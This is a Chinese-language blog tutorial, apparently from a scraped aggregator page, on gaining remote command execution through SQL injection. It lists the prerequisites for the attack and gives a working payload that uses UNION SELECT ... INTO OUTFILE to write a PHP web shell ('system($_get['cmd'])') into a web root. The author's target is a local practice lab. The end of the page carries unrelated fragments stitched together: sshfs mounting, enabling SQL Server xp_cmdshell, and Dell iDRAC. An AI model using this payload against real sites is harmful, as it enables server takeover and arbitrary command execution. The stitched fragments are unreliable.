通過sqli進行伺服器的遠端控制的操作

2021-09-17 03:14:03 字數 2495 閱讀 6901

通過sql inject漏洞寫入惡意**需要三個前提:

1.需要知道遠端目錄,就是你的用php語言寫的**的那個存放php檔案的路徑,我的是在這裡e:\phpstudy\phptutorial\www。關於這個路徑,我在這裡詳細說一下,對於小小白,有基礎的請跳過這段。

這個目錄是我們本地伺服器訪問的目錄,比如,我在我的這個目錄下新建了乙個php檔案,名字叫helloworld,然後我在這個php檔案中寫這樣一段**

然後在我的瀏覽器位址上輸入:

127.0.0.1/helloworld.php

這裡的127.0.0.1/就相當於我的e:\phpstudy\phptutorial\www,在這個目錄下開啟helloworld.php檔案,並執行裡邊的**!

效果如下圖:

這裡說這個的意思就是,這個就是通過sqli進行伺服器的遠端控制的原理,在這個目錄中的php檔案html檔案或者其他類似的檔案,你可以從網頁上訪問到,並且!並且執行裡邊的**!!!

2.需要遠端目錄有些許可權

select "你想要寫入並且讓目標計算機執行的**" into outfile "上面說的那個目錄,目標計算機的那個目錄"
3.目標計算機資料庫開啟secure_file_priv應為我們是以我們自己的計算機作為目標計算機,所以,我們找到在mysql目錄下的my配置檔案(這個配置檔案有不同的字尾,我的是ini,有的是cnf)在這個配置檔案中新增一行新的**:

secure_file_priv=

如下圖:

輸入完後記得儲存,還有,重啟伺服器!

然後從該圖的右邊可以看到,在資料庫中輸入:

show global variables like 『%secure%』

secure_file_priv的右邊從null變成了 空 。ok,第三個條件也滿足了。

如果沒有開啟這個,則會出現這個情況:

實際操作

1.首先現在頁面輸入我們構造的sql語句:

kobe' union select "<?php system($_get['cmd'])?>",2 into outfile "e:/phpstudy/phptutorial/www/virus.php"#
(我選擇的是字元型注入的訓練靶場)

提交給前端得到:

這裡雖然warming,但是它已經執行了這個操作:(在最下面)

我們開啟相對應的目錄:

看到沒,我們上面寫的virus.php檔案出現了,在此之前本資料夾裡是沒有的!

這裡說乙個小問題:如果該目錄已經存在同樣的檔案,那麼他會這樣:

因為我的語句是

kobe' union select "<?php system($_get['cmd'])?>",2 into outfile "e:/phpstudy/phptutorial/www/virus.php"#
所以我現在可以通過網頁來操作目標計算機的cmd命令列了!!效果圖:

從上圖可以看到,在網頁上輸入的語句得到的資訊和在目標計算機的cmd上輸入的語句得到的資訊是完全一樣的!

有乙個需要注意的地方,那個如果路徑裡邊的斜槓是正斜槓,而直接從路徑上複製下來的是反斜槓,這裡需要更改一下。

通過sshfs掛載遠端伺服器目錄

sshfs是基於fuse構建的ssh檔案系統客戶端程式,通過ssh協議來掛載遠端檔案系統,方便而且安全 首先我們需要安裝fuse for macos和sshfs address 或者通過brew來進行安裝 brew cask install osxfuse brew install sshfs接下來...

通過sqlserver使用者操作遠端伺服器

use master goreconfigure 先執行一次重新整理,處理上次的配置 goexec sp configure show advanced options 1 啟用xp cmdshell的高階配置 goreconfigure 重新整理配置 goexec sp configure xp ...

不同的伺服器品牌遠端控制管理

參考 什麼是idrac呢?idrac又稱為integrated dell remote access controller,也就是整合戴爾遠端控制卡,這是戴爾伺服器的獨有功能,idrac卡相當於是附加在伺服器上的一計算機,可以實現一對一的伺服器遠端管理與監控,通過與伺服器主機板上的管理晶元bmc進行...